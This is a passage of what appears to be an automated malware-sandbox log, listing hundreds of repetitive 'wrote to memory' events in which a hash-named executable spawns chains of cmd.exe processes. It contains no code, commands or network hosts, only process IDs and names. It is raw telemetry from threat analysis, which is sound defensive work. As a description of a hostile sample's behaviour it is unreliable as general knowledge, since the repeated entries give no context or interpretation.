1292 cmd.exe 1044 PID 1752 wrote to memory of 232 1752 cmd.exe 1045 PID 1752 wrote to memory of 232 1752 cmd.exe 1045 PID 1752 wrote to memory of 232 1752 cmd.exe 1045 PID 1752 wrote to memory of 232 1752 cmd.exe 1045 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1046 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1046 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1046 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1046 PID 1032 wrote to memory of 908 1032 cmd.exe 1048 PID 1032 wrote to memory of 908 1032 cmd.exe 1048 PID 1032 wrote to memory of 908 1032 cmd.exe 1048 PID 1032 wrote to memory of 908 1032 cmd.exe 1048 PID 1032 wrote to memory of 1968 1032 cmd.exe 1049 PID 1032 wrote to memory of 1968 1032 cmd.exe 1049 PID 1032 wrote to memory of 1968 1032 cmd.exe 1049 PID 1032 wrote to memory of 1968 1032 cmd.exe 1049 PID 1032 wrote to memory of 992 1032 cmd.exe 1050 PID 1032 wrote to memory of 992 1032 cmd.exe 1050 PID 1032 wrote to memory of 992 1032 cmd.exe 1050 PID 1032 wrote to memory of 992 1032 cmd.exe 1050 PID 992 wrote to memory of 984 992 cmd.exe 1051 PID 992 wrote to memory of 984 992 cmd.exe 1051 PID 992 wrote to memory of 984 992 cmd.exe 1051 PID 992 wrote to memory of 984 992 cmd.exe 1051 PID 1032 wrote to memory of 1572 1032 cmd.exe 1052 PID 1032 wrote to memory of 1572 1032 cmd.exe 1052 PID 1032 wrote to memory of 1572 1032 cmd.exe 1052 PID 1032 wrote to memory of 1572 1032 cmd.exe 1052 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1053 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1053 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1053 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1053 PID 1224 wrote to memory of 964 1224 cmd.exe 1055 PID 1224 wrote to memory of 964 1224 cmd.exe 1055 PID 1224 wrote to memory of 964 1224 cmd.exe 1055 PID 1224 wrote to memory of 964 1224 cmd.exe 1055 PID 1224 wrote to memory of 1052 1224 cmd.exe 1056 PID 1224 wrote to memory of 1052 1224 cmd.exe 1056 PID 1224 wrote to memory of 1052 1224 cmd.exe 1056 PID 1224 wrote to memory of 1052 1224 cmd.exe 1056 PID 1224 wrote to memory of 676 1224 cmd.exe 1057 PID 1224 wrote to memory of 676 1224 cmd.exe 1057 PID 1224 wrote to memory of 676 1224 cmd.exe 1057 PID 1224 wrote to memory of 676 1224 cmd.exe 1057 PID 676 wrote to memory of 1828 676 cmd.exe 1058 PID 676 wrote to memory of 1828 676 cmd.exe 1058 PID 676 wrote to memory of 1828 676 cmd.exe 1058 PID 676 wrote to memory of 1828 676 cmd.exe 1058 PID 1224 wrote to memory of 1368 1224 cmd.exe 1059 PID 1224 wrote to memory of 1368 1224 cmd.exe 1059 PID 1224 wrote to memory of 1368 1224 cmd.exe 1059 PID 1224 wrote to memory of 1368 1224 cmd.exe 1059 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1060 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1060 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1060 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1060 PID 1896 wrote to memory of 360 1896 cmd.exe 1062 PID 1896 wrote to memory of 360 1896 cmd.exe 1062 PID 1896 wrote to memory of 360 1896 cmd.exe 1062 PID 1896 wrote to memory of 360 1896 cmd.exe 1062 PID 1896 wrote to memory of 220 1896 cmd.exe 1063 PID 1896 wrote to memory of 220 1896 cmd.exe 1063 PID 1896 wrote to memory of 220 1896 cmd.exe 1063 PID 1896 wrote to memory of 220 1896 cmd.exe 1063 PID 1896 wrote to memory of 1512 1896 cmd.exe 1064 PID 1896 wrote to memory of 1512 1896 cmd.exe 1064 PID 1896 wrote to memory of 1512 1896 cmd.exe 1064 PID 1896 wrote to memory of 1512 1896 cmd.exe 1064 PID 1512 wrote to memory of 904 1512 cmd.exe 1065 PID 1512 wrote to memory of 904 1512 cmd.exe 1065 PID 1512 wrote to memory of 904 1512 cmd.exe 1065 PID 1512 wrote to memory of 904 1512 cmd.exe 1065 PID 1896 wrote to memory of 236 1896 cmd.exe 1066 PID 1896 wrote to memory of 236 1896 cmd.exe 1066 PID 1896 wrote to memory of 236 1896 cmd.exe 1066 PID 1896 wrote to memory of 236 1896 cmd.exe 1066 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1067 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1067 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1067 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1067 PID 1968 wrote to memory of 204 1968 cmd.exe 1069 PID 1968 wrote to memory of 204 1968 cmd.exe 1069 PID 1968 wrote to memory of 204 1968 cmd.exe 1069 PID 1968 wrote to memory of 204 1968 cmd.exe 1069 PID 1968 wrote to memory of 1372 1968 cmd.exe 1070 PID 1968 wrote to memory of 1372 1968 cmd.exe 1070 PID 1968 wrote to memory of 1372 1968 cmd.exe 1070 PID 1968 wrote to memory of 1372 1968 cmd.exe 1070 PID 1968 wrote to memory of 1488 1968 cmd.exe 1071 PID 1968 wrote to memory of 1488 1968 cmd.exe 1071 PID 1968 wrote to memory of 1488 1968 cmd.exe 1071 PID 1968 wrote to memory of 1488 1968 cmd.exe 1071 PID 1488 wrote to memory of 1956 1488 cmd.exe 1072 PID 1488 wrote to memory of 1956 1488 cmd.exe 1072 PID 1488 wrote to memory of 1956 1488 cmd.exe 1072 PID 1488 wrote to memory of 1956 1488 cmd.exe 1072 PID 1968 wrote to memory of 1156 1968 cmd.exe 1073 PID 1968 wrote to memory of 1156 1968 cmd.exe 1073 PID 1968 wrote to memory of 1156 1968 cmd.exe 1073 PID 1968 wrote to memory of 1156 1968 cmd.exe 1073 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1074 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1074 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1074 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1074 PID 1052 wrote to memory of 652 1052 cmd.exe 1076 PID 1052 wrote to memory of 652 1052 cmd.exe 1076 PID 1052 wrote to memory of 652 1052 cmd.exe 1076 PID 1052 wrote to memory of 652 1052 cmd.exe 1076 PID 1052 wrote to memory of 568 1052 cmd.exe 1077 PID 1052 wrote to memory of 568 1052 cmd.exe 1077 PID 1052 wrote to memory of 568 1052 cmd.exe 1077 PID 1052 wrote to memory of 568 1052 cmd.exe 1077 PID 1052 wrote to memory of 1068 1052 cmd.exe 1078 PID 1052 wrote to memory of 1068 1052 cmd.exe 1078 PID 1052 wrote to memory of 1068 1052 cmd.exe 1078 PID 1052 wrote to memory of 1068 1052 cmd.exe 1078 PID 1068 wrote to memory of 980 1068 cmd.exe 1079 PID 1068 wrote to memory of 980 1068 cmd.exe 1079 PID 1068 wrote to memory of 980 1068 cmd.exe 1079 PID 1068 wrote to memory of 980 1068 cmd.exe 1079 PID 1052 wrote to memory of 1920 1052 cmd.exe 1080 PID 1052 wrote to memory of 1920 1052 cmd.exe 1080 PID 1052 wrote to memory of 1920 1052 cmd.exe 1080 PID 1052 wrote to memory of 1920 1052 cmd.exe 1080 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1081 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1081 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1081 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1081 PID 220 wrote to memory of 952 220 cmd.exe 1083 PID 220 wrote to memory of 952 220 cmd.exe 1083 PID 220 wrote to memory of 952 220 cmd.exe 1083 PID 220 wrote to memory of 952 220 cmd.exe 1083 PID 220 wrote to memory of 1820 220 cmd.exe 1084 PID 220 wrote to memory of 1820 220 cmd.exe 1084 PID 220 wrote to memory of 1820 220 cmd.exe 1084 PID 220 wrote to memory of 1820 220 cmd.exe 1084 PID 220 wrote to memory of 2044 220 cmd.exe 1085 PID 220 wrote to memory of 2044 220 cmd.exe 1085 PID 220 wrote to memory of 2044 220 cmd.exe 1085 PID 220 wrote to memory of 2044 220 cmd.exe 1085 PID 2044 wrote to memory of 1376 2044 cmd.exe 1086 PID 2044 wrote to memory of 1376 2044 cmd.exe 1086 PID 2044 wrote to memory of 1376 2044 cmd.exe 1086 PID 2044 wrote to memory of 1376 2044 cmd.exe 1086 PID 220 wrote to memory of 992 220 cmd.exe 1087 PID 220 wrote to memory of 992 220 cmd.exe 1087 PID 220 wrote to memory of 992 220 cmd.exe 1087 PID 220 wrote to memory of 992 220 cmd.exe 1087 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1088 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1088 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1088 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1088 PID 1032 wrote to memory of 1488 1032 cmd.exe 1090 PID 1032 wrote to memory of 1488 1032 cmd.exe 1090 PID 1032 wrote to memory of 1488 1032 cmd.exe 1090 PID 1032 wrote to memory of 1488 1032 cmd.exe 1090 PID 1032 wrote to memory of 1812 1032 cmd.exe 1091 PID 1032 wrote to memory of 1812 1032 cmd.exe 1091 PID 1032 wrote to memory of 1812 1032 cmd.exe 1091 PID 1032 wrote to memory of 1812 1032 cmd.exe 1091 PID 1032 wrote to memory of 1968 1032 cmd.exe 1092 PID 1032 wrote to memory of 1968 1032 cmd.exe 1092 PID 1032 wrote to memory of 1968 1032 cmd.exe 1092 PID 1032 wrote to memory of 1968 1032 cmd.exe 1092 PID 1968 wrote to memory of 1244 1968 cmd.exe 1093 PID 1968 wrote to memory of 1244 1968 cmd.exe 1093 PID 1968 wrote to memory of 1244 1968 cmd.exe 1093 PID 1968 wrote to memory of 1244 1968 cmd.exe 1093 PID 1032 wrote to memory of 652 1032 cmd.exe 1094 PID 1032 wrote to memory of 652 1032 cmd.exe 1094 PID 1032 wrote to memory of 652 1032 cmd.exe 1094 PID 1032 wrote to memory of 652 1032 cmd.exe 1094 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1095 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1095 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1095 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1095 PID 948 wrote to memory of 232 948 cmd.exe 1097 PID 948 wrote to memory of 232 948 cmd.exe 1097 PID 948 wrote to memory of 232 948 cmd.exe 1097 PID 948 wrote to memory of 232 948 cmd.exe 1097 PID 948 wrote to memory of 1920 948 cmd.exe 1098 PID 948 wrote to memory of 1920 948 cmd.exe 1098 PID 948 wrote to memory of 1920 948 cmd.exe 1098 PID 948 wrote to memory of 1920 948 cmd.exe 1098 PID 948 wrote to memory of 1080 948 cmd.exe 1099 PID 948 wrote to memory of 1080 948 cmd.exe 1099 PID 948 wrote to memory of 1080 948 cmd.exe 1099 PID 948 wrote to memory of 1080 948 cmd.exe 1099 PID 1080 wrote to memory of 700 1080 cmd.exe 1100 PID 1080 wrote to memory of 700 1080 cmd.exe 1100 PID 1080 wrote to memory of 700 1080 cmd.exe 1100 PID 1080 wrote to memory of 700 1080 cmd.exe 1100 PID 948 wrote to memory of 236 948 cmd.exe 1101 PID 948 wrote to memory of 236 948 cmd.exe 1101 PID 948 wrote to memory of 236 948 cmd.exe 1101 PID 948 wrote to memory of 236 948 cmd.exe 1101 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1102 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1102 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1102 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1102 PID 864 wrote to memory of 1572 864 cmd.exe 1104 PID 864 wrote to memory of 1572 864 cmd.exe 1104 PID 864 wrote to memory of 1572 864 cmd.exe 1104 PID 864 wrote to memory of 1572 864 cmd.exe 1104 PID 864 wrote to memory of 992 864 cmd.exe 1105 PID 864 wrote to memory of 992 864 cmd.exe 1105 PID 864 wrote to memory of 992 864 cmd.exe 1105 PID 864 wrote to memory of 992 864 cmd.exe 1105 PID 864 wrote to memory of 320 864 cmd.exe 1106 PID 864 wrote to memory of 320 864 cmd.exe 1106 PID 864 wrote to memory of 320 864 cmd.exe 1106 PID 864 wrote to memory of 320 864 cmd.exe 1106 PID 320 wrote to memory of 592 320 cmd.exe 1107 PID 320 wrote to memory of 592 320 cmd.exe 1107 PID 320 wrote to memory of 592 320 cmd.exe 1107 PID 320 wrote to memory of 592 320 cmd.exe 1107 PID 864 wrote to memory of 1488 864 cmd.exe 1108 PID 864 wrote to memory of 1488 864 cmd.exe 1108 PID 864 wrote to memory of 1488 864 cmd.exe 1108 PID 864 wrote to memory of 1488 864 cmd.exe 1108 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1109 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1109 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1109 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1109 PID 212 wrote to memory of 1968 212 cmd.exe 1111 PID 212 wrote to memory of 1968 212 cmd.exe 1111 PID 212 wrote to memory of 1968 212 cmd.exe 1111 PID 212 wrote to memory of 1968 212 cmd.exe 1111 PID 212 wrote to memory of 1240 212 cmd.exe 1112 PID 212 wrote to memory of 1240 212 cmd.exe 1112 PID 212 wrote to memory of 1240 212 cmd.exe 1112 PID 212 wrote to memory of 1240 212 cmd.exe 1112 PID 212 wrote to memory of 1032 212 cmd.exe 1113 PID 212 wrote to memory of 1032 212 cmd.exe 1113 PID 212 wrote to memory of 1032 212 cmd.exe 1113 PID 212 wrote to memory of 1032 212 cmd.exe 1113 PID 1032 wrote to memory of 436 1032 cmd.exe 1114 PID 1032 wrote to memory of 436 1032 cmd.exe 1114 PID 1032 wrote to memory of 436 1032 cmd.exe 1114 PID 1032 wrote to memory of 436 1032 cmd.exe 1114 PID 212 wrote to memory of 232 212 cmd.exe 1115 PID 212 wrote to memory of 232 212 cmd.exe 1115 PID 212 wrote to memory of 232 212 cmd.exe 1115 PID 212 wrote to memory of 232 212 cmd.exe 1115 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1116 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1116 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1116 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1116 PID 216 wrote to memory of 1080 216 cmd.exe 1118 PID 216 wrote to memory of 1080 216 cmd.exe 1118 PID 216 wrote to memory of 1080 216 cmd.exe 1118 PID 216 wrote to memory of 1080 216 cmd.exe 1118 PID 216 wrote to memory of 236 216 cmd.exe 1119 PID 216 wrote to memory of 236 216 cmd.exe 1119 PID 216 wrote to memory of 236 216 cmd.exe 1119 PID 216 wrote to memory of 236 216 cmd.exe 1119 PID 216 wrote to memory of 524 216 cmd.exe 1120 PID 216 wrote to memory of 524 216 cmd.exe 1120 PID 216 wrote to memory of 524 216 cmd.exe 1120 PID 216 wrote to memory of 524 216 cmd.exe 1120 PID 524 wrote to memory of 228 524 cmd.exe 1121 PID 524 wrote to memory of 228 524 cmd.exe 1121 PID 524 wrote to memory of 228 524 cmd.exe 1121 PID 524 wrote to memory of 228 524 cmd.exe 1121 PID 216 wrote to memory of 1572 216 cmd.exe 1122 PID 216 wrote to memory of 1572 216 cmd.exe 1122 PID 216 wrote to memory of 1572 216 cmd.exe 1122 PID 216 wrote to memory of 1572 216 cmd.exe 1122 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1123 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1123 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1123 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1123 PID 1216 wrote to memory of 1180 1216 cmd.exe 1125 PID 1216 wrote to memory of 1180 1216 cmd.exe 1125 PID 1216 wrote to memory of 1180 1216 cmd.exe 1125 PID 1216 wrote to memory of 1180 1216 cmd.exe 1125 PID 1216 wrote to memory of 1896 1216 cmd.exe 1126 PID 1216 wrote to memory of 1896 1216 cmd.exe 1126 PID 1216 wrote to memory of 1896 1216 cmd.exe 1126 PID 1216 wrote to memory of 1896 1216 cmd.exe 1126 PID 1216 wrote to memory of 2044 1216 cmd.exe 1127 PID 1216 wrote to memory of 2044 1216 cmd.exe 1127 PID 1216 wrote to memory of 2044 1216 cmd.exe 1127 PID 1216 wrote to memory of 2044 1216 cmd.exe 1127 PID 2044 wrote to memory of 224 2044 cmd.exe 1128 PID 2044 wrote to memory of 224 2044 cmd.exe 1128 PID 2044 wrote to memory of 224 2044 cmd.exe 1128 PID 2044 wrote to memory of 224 2044 cmd.exe 1128 PID 1216 wrote to memory of 1956 1216 cmd.exe 1129 PID 1216 wrote to memory of 1956 1216 cmd.exe 1129 PID 1216 wrote to memory of 1956 1216 cmd.exe 1129 PID 1216 wrote to memory of 1956 1216 cmd.exe 1129 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1130 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1130 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1130 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1130 PID 1292 wrote to memory of 1052 1292 cmd.exe 1132 PID 1292 wrote to memory of 1052 1292 cmd.exe 1132 PID 1292 wrote to memory of 1052 1292 cmd.exe 1132 PID 1292 wrote to memory of 1052 1292 cmd.exe 1132 PID 1292 wrote to memory of 232 1292 cmd.exe 1133 PID 1292 wrote to memory of 232 1292 cmd.exe 1133 PID 1292 wrote to memory of 232 1292 cmd.exe 1133 PID 1292 wrote to memory of 232 1292 cmd.exe 1133 PID 1292 wrote to memory of 1064 1292 cmd.exe 1134 PID 1292 wrote to memory of 1064 1292 cmd.exe 1134 PID 1292 wrote to memory of 1064 1292 cmd.exe 1134 PID 1292 wrote to memory of 1064 1292 cmd.exe 1134 PID 1064 wrote to memory of 908 1064 cmd.exe 1135 PID 1064 wrote to memory of 908 1064 cmd.exe 1135 PID 1064 wrote to memory of 908 1064 cmd.exe 1135 PID 1064 wrote to memory of 908 1064 cmd.exe 1135 PID 1292 wrote to memory of 756 1292 cmd.exe 1136 PID 1292 wrote to memory of 756 1292 cmd.exe 1136 PID 1292 wrote to memory of 756 1292 cmd.exe 1136 PID 1292 wrote to memory of 756 1292 cmd.exe 1136 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1137 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1137 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1137 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1137 PID 204 wrote to memory of 904 204 cmd.exe 1139 PID 204 wrote to memory of 904 204 cmd.exe 1139 PID 204 wrote to memory of 904 204 cmd.exe 1139 PID 204 wrote to memory of 904 204 cmd.exe 1139 PID 204 wrote to memory of 1572 204 cmd.exe 1140 PID 204 wrote to memory of 1572 204 cmd.exe 1140 PID 204 wrote to memory of 1572 204 cmd.exe 1140 PID 204 wrote to memory of 1572 204 cmd.exe 1140 PID 204 wrote to memory of 952 204 cmd.exe 1141 PID 204 wrote to memory of 952 204 cmd.exe 1141 PID 204 wrote to memory of 952 204 cmd.exe 1141 PID 204 wrote to memory of 952 204 cmd.exe 1141 PID 952 wrote to memory of 964 952 cmd.exe 1142 PID 952 wrote to memory of 964 952 cmd.exe 1142 PID 952 wrote to memory of 964 952 cmd.exe 1142 PID 952 wrote to memory of 964 952 cmd.exe 1142 PID 204 wrote to memory of 1156 204 cmd.exe 1143 PID 204 wrote to memory of 1156 204 cmd.exe 1143 PID 204 wrote to memory of 1156 204 cmd.exe 1143 PID 204 wrote to memory of 1156 204 cmd.exe 1143 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1144 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1144 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1144 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1144 PID 1220 wrote to memory of 2044 1220 cmd.exe 1146 PID 1220 wrote to memory of 2044 1220 cmd.exe 1146 PID 1220 wrote to memory of 2044 1220 cmd.exe 1146 PID 1220 wrote to memory of 2044 1220 cmd.exe 1146 PID 1220 wrote to memory of 1960 1220 cmd.exe 1147 PID 1220 wrote to memory of 1960 1220 cmd.exe 1147 PID 1220 wrote to memory of 1960 1220 cmd.exe 1147 PID 1220 wrote to memory of 1960 1220 cmd.exe 1147 PID 1220 wrote to memory of 1216 1220 cmd.exe 1148 PID 1220 wrote to memory of 1216 1220 cmd.exe 1148 PID 1220 wrote to memory of 1216 1220 cmd.exe 1148 PID 1220 wrote to memory of 1216 1220 cmd.exe 1148 PID 1216 wrote to memory of 360 1216 cmd.exe 1149 PID 1216 wrote to memory of 360 1216 cmd.exe 1149 PID 1216 wrote to memory of 360 1216 cmd.exe 1149 PID 1216 wrote to memory of 360 1216 cmd.exe 1149 PID 1220 wrote to memory of 1052 1220 cmd.exe 1150 PID 1220 wrote to memory of 1052 1220 cmd.exe 1150 PID 1220 wrote to memory of 1052 1220 cmd.exe 1150 PID 1220 wrote to memory of 1052 1220 cmd.exe 1150 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1151 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1151 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1151 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1151 PID 1512 wrote to memory of 1064 1512 cmd.exe 1153 PID 1512 wrote to memory of 1064 1512 cmd.exe 1153 PID 1512 wrote to memory of 1064 1512 cmd.exe 1153 PID 1512 wrote to memory of 1064 1512 cmd.exe 1153 PID 1512 wrote to memory of 948 1512 cmd.exe 1154 PID 1512 wrote to memory of 948 1512 cmd.exe 1154 PID 1512 wrote to memory of 948 1512 cmd.exe 1154 PID 1512 wrote to memory of 948 1512 cmd.exe 1154 PID 1512 wrote to memory of 980 1512 cmd.exe 1155 PID 1512 wrote to memory of 980 1512 cmd.exe 1155 PID 1512 wrote to memory of 980 1512 cmd.exe 1155 PID 1512 wrote to memory of 980 1512 cmd.exe 1155 PID 980 wrote to memory of 1836 980 cmd.exe 1156 PID 980 wrote to memory of 1836 980 cmd.exe 1156 PID 980 wrote to memory of 1836 980 cmd.exe 1156 PID 980 wrote to memory of 1836 980 cmd.exe 1156 PID 1512 wrote to memory of 904 1512 cmd.exe 1157 PID 1512 wrote to memory of 904 1512 cmd.exe 1157 PID 1512 wrote to memory of 904 1512 cmd.exe 1157 PID 1512 wrote to memory of 904 1512 cmd.exe 1157 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1158 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1158 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1158 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1158 PID 216 wrote to memory of 952 216 cmd.exe 1160 PID 216 wrote to memory of 952 216 cmd.exe 1160 PID 216 wrote to memory of 952 216 cmd.exe 1160 PID 216 wrote to memory of 952 216 cmd.exe 1160 PID 216 wrote to memory of 1180 216 cmd.exe 1161 PID 216 wrote to memory of 1180 216 cmd.exe 1161 PID 216 wrote to memory of 1180 216 cmd.exe 1161 PID 216 wrote to memory of 1180 216 cmd.exe 1161 PID 216 wrote to memory of 1376 216 cmd.exe 1162 PID 216 wrote to memory of 1376 216 cmd.exe 1162 PID 216 wrote to memory of 1376 216 cmd.exe 1162 PID 216 wrote to memory of 1376 216 cmd.exe 1162 PID 1376 wrote to memory of 1368 1376 cmd.exe 1163 PID 1376 wrote to memory of 1368 1376 cmd.exe 1163 PID 1376 wrote to memory of 1368 1376 cmd.exe 1163 PID 1376 wrote to memory of 1368 1376 cmd.exe 1163 PID 216 wrote to memory of 2044 216 cmd.exe 1164 PID 216 wrote to memory of 2044 216 cmd.exe 1164 PID 216 wrote to memory of 2044 216 cmd.exe 1164 PID 216 wrote to memory of 2044 216 cmd.exe 1164 PID 672 wrote to memory of 1472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1165 PID 672 wrote to memory of 1472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1165 PID 672 wrote to memory of 1472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1165 PID 672 wrote to memory of 1472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1165 PID 1472 wrote to memory of 1216 1472 cmd.exe 1167 PID 1472 wrote to memory of 1216 1472 cmd.exe 1167 PID 1472 wrote to memory of 1216 1472 cmd.exe 1167 PID 1472 wrote to memory of 1216 1472 cmd.exe 1167 PID 1472 wrote to memory of 984 1472 cmd.exe 1168 PID 1472 wrote to memory of 984 1472 cmd.exe 1168 PID 1472 wrote to memory of 984 1472 cmd.exe 1168 PID 1472 wrote to memory of 984 1472 cmd.exe 1168 PID 1472 wrote to memory of 1220 1472 cmd.exe 1169 PID 1472 wrote to memory of 1220 1472 cmd.exe 1169 PID 1472 wrote to memory of 1220 1472 cmd.exe 1169 PID 1472 wrote to memory of 1220 1472 cmd.exe 1169 PID 1220 wrote to memory of 280 1220 cmd.exe 1170 PID 1220 wrote to memory of 280 1220 cmd.exe 1170 PID 1220 wrote to memory of 280 1220 cmd.exe 1170 PID 1220 wrote to memory of 280 1220 cmd.exe 1170 PID 1472 wrote to memory of 1064 1472 cmd.exe 1171 PID 1472 wrote to memory of 1064 1472 cmd.exe 1171 PID 1472 wrote to memory of 1064 1472 cmd.exe 1171 PID 1472 wrote to memory of 1064 1472 cmd.exe 1171 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1172 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1172 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1172 PID 672 wrote to memory of 1292 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1172 PID 1292 wrote to memory of 980 1292 cmd.exe 1174 PID 1292 wrote to memory of 980 1292 cmd.exe 1174 PID 1292 wrote to memory of 980 1292 cmd.exe 1174 PID 1292 wrote to memory of 980 1292 cmd.exe 1174 PID 1292 wrote to 